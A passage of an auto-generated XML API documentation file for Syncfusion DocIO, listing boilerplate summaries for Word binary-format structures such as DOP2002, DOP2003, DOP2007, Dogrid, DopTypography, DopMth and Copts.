        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.LiveRecover">
            <summary>
            Gets or sets a value indicating whether [live recover].
            </summary>
            <value><c>true</c> if [live recover]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.EmbedFactoids">
            <summary>
            Gets or sets a value indicating whether [embed factoids].
            </summary>
            <value><c>true</c> if [embed factoids]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.FactoidXML">
            <summary>
            Gets or sets a value indicating whether [factoid XML].
            </summary>
            <value><c>true</c> if [factoid XML]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.FactoidAllDone">
            <summary>
            Gets or sets a value indicating whether [factoid all done].
            </summary>
            <value><c>true</c> if [factoid all done]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.FolioPrint">
            <summary>
            Gets or sets a value indicating whether [folio print].
            </summary>
            <value><c>true</c> if [folio print]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.ReverseFolio">
            <summary>
            Gets or sets a value indicating whether [reverse folio].
            </summary>
            <value><c>true</c> if [reverse folio]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.TextLineEnding">
            <summary>
            Gets or sets the text line ending.
            </summary>
            <value>The text line ending.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.HideFcc">
            <summary>
            Gets or sets a value indicating whether [hide FCC].
            </summary>
            <value><c>true</c> if [hide FCC]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.AcetateShowMarkup">
            <summary>
            Gets or sets a value indicating whether [acetate show markup].
            </summary>
            <value><c>true</c> if [acetate show markup]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.AcetateShowAtn">
            <summary>
            Gets or sets a value indicating whether [acetate show atn].
            </summary>
            <value><c>true</c> if [acetate show atn]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.AcetateShowInsDel">
            <summary>
            Gets or sets a value indicating whether [acetate show ins del].
            </summary>
            <value><c>true</c> if [acetate show ins del]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.AcetateShowProps">
            <summary>
            Gets or sets a value indicating whether [acetate show props].
            </summary>
            <value><c>true</c> if [acetate show props]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.IstdTableDflt">
            <summary>
            Gets or sets the istd table DFLT.
            </summary>
            <value>The istd table DFLT.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.VerCompat">
            <summary>
            Gets or sets the ver compat.
            </summary>
            <value>The ver compat.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.GrfFmtFilter">
            <summary>
            Gets or sets the GRF FMT filter.
            </summary>
            <value>The GRF FMT filter.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.IFolioPages">
            <summary>
            Gets or sets the I folio pages.
            </summary>
            <value>The I folio pages.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.CpgText">
            <summary>
            Gets or sets the CPG text.
            </summary>
            <value>The CPG text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.CpMinRMText">
            <summary>
            Gets or sets the cp min RM text.
            </summary>
            <value>The cp min RM text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.CpMinRMFtn">
            <summary>
            Gets or sets the cp min RM FTN.
            </summary>
            <value>The cp min RM FTN.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.CpMinRMHdd">
            <summary>
            Gets or sets the cp min RM HDD.
            </summary>
            <value>The cp min RM HDD.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.CpMinRMAtn">
            <summary>
            Gets or sets the cp min RM atn.
            </summary>
            <value>The cp min RM atn.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.CpMinRMEdn">
            <summary>
            Gets or sets the cp min RM edn.
            </summary>
            <value>The cp min RM edn.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.CpMinRmTxbx">
            <summary>
            Gets or sets the cp min rm TXBX.
            </summary>
            <value>The cp min rm TXBX.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2002.CpMinRmHdrTxbx">
            <summary>
            Gets or sets the cp min rm HDR TXBX.
            </summary>
            <value>The cp min rm HDR TXBX.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003">
            <summary>
            Specifies the structure of Dop2003.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003"/> class.
            </summary>
            <param name="dopBase">The dop base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.TreatLockAtnAsReadOnly">
            <summary>
            Gets or sets a value indicating whether [treat lock atn as read only].
            </summary>
            <value>
            	<c>true</c> if [treat lock atn as read only]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.StyleLock">
            <summary>
            Gets or sets a value indicating whether [style lock].
            </summary>
            <value><c>true</c> if [style lock]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.AutoFmtOverride">
            <summary>
            Gets or sets a value indicating whether [auto FMT override].
            </summary>
            <value><c>true</c> if [auto FMT override]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.RemoveWordML">
            <summary>
            Gets or sets a value indicating whether [remove word ML].
            </summary>
            <value><c>true</c> if [remove word ML]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.ApplyCustomXForm">
            <summary>
            Gets or sets a value indicating whether [apply custom X form].
            </summary>
            <value><c>true</c> if [apply custom X form]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.StyleLockEnforced">
            <summary>
            Gets or sets a value indicating whether [style lock enforced].
            </summary>
            <value><c>true</c> if [style lock enforced]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.FakeLockAtn">
            <summary>
            Gets or sets a value indicating whether [fake lock atn].
            </summary>
            <value><c>true</c> if [fake lock atn]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.IgnoreMixedContent">
            <summary>
            Gets or sets a value indicating whether [ignore mixed content].
            </summary>
            <value><c>true</c> if [ignore mixed content]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.ShowPlaceholderText">
            <summary>
            Gets or sets a value indicating whether [show placeholder text].
            </summary>
            <value><c>true</c> if [show placeholder text]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.Word97Doc">
            <summary>
            Gets or sets a value indicating whether [word97 doc].
            </summary>
            <value><c>true</c> if [word97 doc]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.StyleLockTheme">
            <summary>
            Gets or sets a value indicating whether [style lock theme].
            </summary>
            <value><c>true</c> if [style lock theme]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.StyleLockQFSet">
            <summary>
            Gets or sets a value indicating whether [style lock QF set].
            </summary>
            <value><c>true</c> if [style lock QF set]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.ReadingModeInkLockDown">
            <summary>
            Gets or sets a value indicating whether [reading mode ink lock down].
            </summary>
            <value>
            	<c>true</c> if [reading mode ink lock down]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.AcetateShowInkAtn">
            <summary>
            Gets or sets a value indicating whether [acetate show ink atn].
            </summary>
            <value><c>true</c> if [acetate show ink atn]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.FilterDttm">
            <summary>
            Gets or sets a value indicating whether [filter DTTM].
            </summary>
            <value><c>true</c> if [filter DTTM]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.EnforceDocProt">
            <summary>
            Gets or sets a value indicating whether [enforce doc prot].
            </summary>
            <value><c>true</c> if [enforce doc prot]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.DocProtCur">
            <summary>
            Gets or sets the doc prot cur.
            </summary>
            <value>The doc prot cur.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.DispBkSpSaved">
            <summary>
            Gets or sets a value indicating whether to display background objects (displayBackgroundShape - Open xml property).
            </summary>
            <value><c>true</c> if display background objects; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.DxaPageLock">
            <summary>
            Gets or sets the dxa page lock.
            </summary>
            <value>The dxa page lock.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.DyaPageLock">
            <summary>
            Gets or sets the dya page lock.
            </summary>
            <value>The dya page lock.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.PctFontLock">
            <summary>
            Gets or sets the PCT font lock.
            </summary>
            <value>The PCT font lock.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.Grfitbid">
            <summary>
            Gets or sets the grfitbid.
            </summary>
            <value>The grfitbid.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2003.IlfoMacAtCleanup">
            <summary>
            Gets or sets the ilfo mac at cleanup.
            </summary>
            <value>The ilfo mac at cleanup.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007">
            <summary>
            Specifies the structure of Dop2007.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007"/> class.
            </summary>
            <param name="dopBase">The dop base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007.RMTrackFormatting">
            <summary>
            Gets or sets a value indicating whether [RM track formatting].
            </summary>
            <value><c>true</c> if [RM track formatting]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007.RMTrackMoves">
            <summary>
            Gets or sets a value indicating whether [RM track moves].
            </summary>
            <value><c>true</c> if [RM track moves]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007.Ssm">
            <summary>
            Gets or sets the SSM.
            </summary>
            <value>The SSM.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007.ReadingModeInkLockDownActualPage">
            <summary>
            Gets or sets a value indicating whether [reading mode ink lock down actual page].
            </summary>
            <value>
            	<c>true</c> if [reading mode ink lock down actual page]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007.AutoCompressPictures">
            <summary>
            Gets or sets a value indicating whether [auto compress pictures].
            </summary>
            <value>
            	<c>true</c> if [auto compress pictures]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOP2007.DopMath">
            <summary>
            Gets the dop math.
            </summary>
            <value>The dop math.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi">
            <summary>
            Specifies the structure of Asumyi.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.Valid">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi"/> is valid.
            </summary>
            <value><c>true</c> if valid; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.View">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi"/> is view.
            </summary>
            <value><c>true</c> if view; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.ViewBy">
            <summary>
            Gets or sets the view by.
            </summary>
            <value>The view by.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.UpdateProps">
            <summary>
            Gets or sets a value indicating whether [update props].
            </summary>
            <value><c>true</c> if [update props]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.WDlgLevel">
            <summary>
            Gets or sets the W DLG level.
            </summary>
            <value>The W DLG level.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.LHighestLevel">
            <summary>
            Gets or sets the L highest level.
            </summary>
            <value>The L highest level.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Asumyi.LCurrentLevel">
            <summary>
            Gets or sets the L current level.
            </summary>
            <value>The L current level.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid">
            <summary>
            Specifies the structure of Dogrid.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.XaGrid">
            <summary>
            Gets or sets the xa grid.
            </summary>
            <value>The xa grid.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.YaGrid">
            <summary>
            Gets or sets the ya grid.
            </summary>
            <value>The ya grid.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.DxaGrid">
            <summary>
            Gets or sets the dxa grid.
            </summary>
            <value>The dxa grid.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.DyaGrid">
            <summary>
            Gets or sets the dya grid.
            </summary>
            <value>The dya grid.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.DyGridDisplay">
            <summary>
            Gets or sets the dy grid display.
            </summary>
            <value>The dy grid display.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.DxGridDisplay">
            <summary>
            Gets or sets the dx grid display.
            </summary>
            <value>The dx grid display.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Dogrid.FollowMargins">
            <summary>
            Gets or sets a value indicating whether [follow margins].
            </summary>
            <value><c>true</c> if [follow margins]; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography">
            <summary>
            Specifies the structure of DopTypography.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.KerningPunct">
            <summary>
            Gets or sets a value indicating whether [kerning punct].
            </summary>
            <value><c>true</c> if [kerning punct]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.Justification">
            <summary>
            Gets or sets the justification.
            </summary>
            <value>The justification.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.LevelOfKinsoku">
            <summary>
            Gets or sets the level of kinsoku.
            </summary>
            <value>The level of kinsoku.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.Print2on1">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography"/> is print2on1.
            </summary>
            <value><c>true</c> if print2on1; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.CustomKsu">
            <summary>
            Gets or sets the custom ksu.
            </summary>
            <value>The custom ksu.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.JapaneseUseLevel2">
            <summary>
            Gets or sets a value indicating whether [japanese use level2].
            </summary>
            <value><c>true</c> if [japanese use level2]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.CchFollowingPunct">
            <summary>
            Gets or sets the CCH following punct.
            </summary>
            <value>The CCH following punct.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.CchLeadingPunct">
            <summary>
            Gets or sets the CCH leading punct.
            </summary>
            <value>The CCH leading punct.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.RgxchFPunct">
            <summary>
            Gets or sets the RGXCH F punct.
            </summary>
            <value>The RGXCH F punct.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopTypography.RgxchLPunct">
            <summary>
            Gets or sets the RGXCH L punct.
            </summary>
            <value>The RGXCH L punct.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth">
            <summary>
            Specifies the structure of DopMth.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.Mthbrk">
            <summary>
            Gets or sets the MTHBRK.
            </summary>
            <value>The MTHBRK.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.MthbrkSub">
            <summary>
            Gets or sets the MTHBRK sub.
            </summary>
            <value>The MTHBRK sub.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.Mthbpjc">
            <summary>
            Gets or sets the MTHBPJC.
            </summary>
            <value>The MTHBPJC.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.MathSmallFrac">
            <summary>
            Gets or sets a value indicating whether [math small frac].
            </summary>
            <value><c>true</c> if [math small frac]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.MathIntLimUndOvr">
            <summary>
            Gets or sets a value indicating whether [math int lim und ovr].
            </summary>
            <value><c>true</c> if [math int lim und ovr]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.MathNaryLimUndOvr">
            <summary>
            Gets or sets a value indicating whether [math nary lim und ovr].
            </summary>
            <value><c>true</c> if [math nary lim und ovr]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.MathWrapAlignLeft">
            <summary>
            Gets or sets a value indicating whether [math wrap align left].
            </summary>
            <value><c>true</c> if [math wrap align left]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.MathUseDispDefaults">
            <summary>
            Gets or sets a value indicating whether [math use disp defaults].
            </summary>
            <value>
            	<c>true</c> if [math use disp defaults]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.FtcMath">
            <summary>
            Gets or sets the FTC math.
            </summary>
            <value>The FTC math.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.DxaLeftMargin">
            <summary>
            Gets or sets the dxa left margin.
            </summary>
            <value>The dxa left margin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.DxaRightMargin">
            <summary>
            Gets or sets the dxa right margin.
            </summary>
            <value>The dxa right margin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DopMth.DxaIndentWrapped">
            <summary>
            Gets or sets the dxa indent wrapped.
            </summary>
            <value>The dxa indent wrapped.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts">
            <summary>
            Specifies the structure of Copts.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts"/> class.
            </summary>
            <param name="dopBase">The dop base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.Copts80">
            <summary>
            Gets the copts80.
            </summary>
            <value>The copts80.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.SpLayoutLikeWW8">
            <summary>
            Gets or sets a value indicating whether [sp layout like W w8].
            </summary>
            <value><c>true</c> if [sp layout like W w8]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.FtnLayoutLikeWW8">
            <summary>
            Gets or sets a value indicating whether [FTN layout like W w8].
            </summary>
            <value><c>true</c> if [FTN layout like W w8]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontUseHTMLParagraphAutoSpacing">
            <summary>
            Gets or sets a value indicating whether [dont use HTML paragraph auto spacing].
            </summary>
            <value>
            	<c>true</c> if [dont use HTML paragraph auto spacing]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontAdjustLineHeightInTable">
            <summary>
            Gets or sets a value indicating whether [dont adjust line height in table].
            </summary>
            <value>
            	<c>true</c> if [dont adjust line height in table]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.ForgetLastTabAlign">
            <summary>
            Gets or sets a value indicating whether [forget last tab align].
            </summary>
            <value><c>true</c> if [forget last tab align]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.UseAutospaceForFullWidthAlpha">
            <summary>
            Gets or sets a value indicating whether [use autospace for full width alpha].
            </summary>
            <value>
            	<c>true</c> if [use autospace for full width alpha]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.AlignTablesRowByRow">
            <summary>
            Gets or sets a value indicating whether [align tables row by row].
            </summary>
            <value>
            	<c>true</c> if [align tables row by row]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.LayoutRawTableWidth">
            <summary>
            Gets or sets a value indicating whether [layout raw table width].
            </summary>
            <value>
            	<c>true</c> if [layout raw table width]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.LayoutTableRowsApart">
            <summary>
            Gets or sets a value indicating whether [layout table rows apart].
            </summary>
            <value>
            	<c>true</c> if [layout table rows apart]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.UseWord97LineBreakingRules">
            <summary>
            Gets or sets a value indicating whether [use word97 line breaking rules].
